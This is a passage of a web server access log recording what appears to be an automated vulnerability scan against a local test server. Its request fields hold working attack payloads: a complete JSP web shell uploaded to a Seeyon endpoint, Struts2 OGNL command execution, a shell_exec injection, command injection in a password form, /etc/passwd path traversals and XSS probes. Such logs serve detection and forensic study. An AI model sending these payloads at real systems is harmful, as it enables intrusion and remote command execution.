"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x2229KFpa7EIikZv2ZNisLxGxKMAMx\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x2229KFpa7EIikZv2ZNisLxGxKMAMx\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&29KFpa7EIikZv2ZNisLxGxKMAMx=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /password_change.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /neos/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name 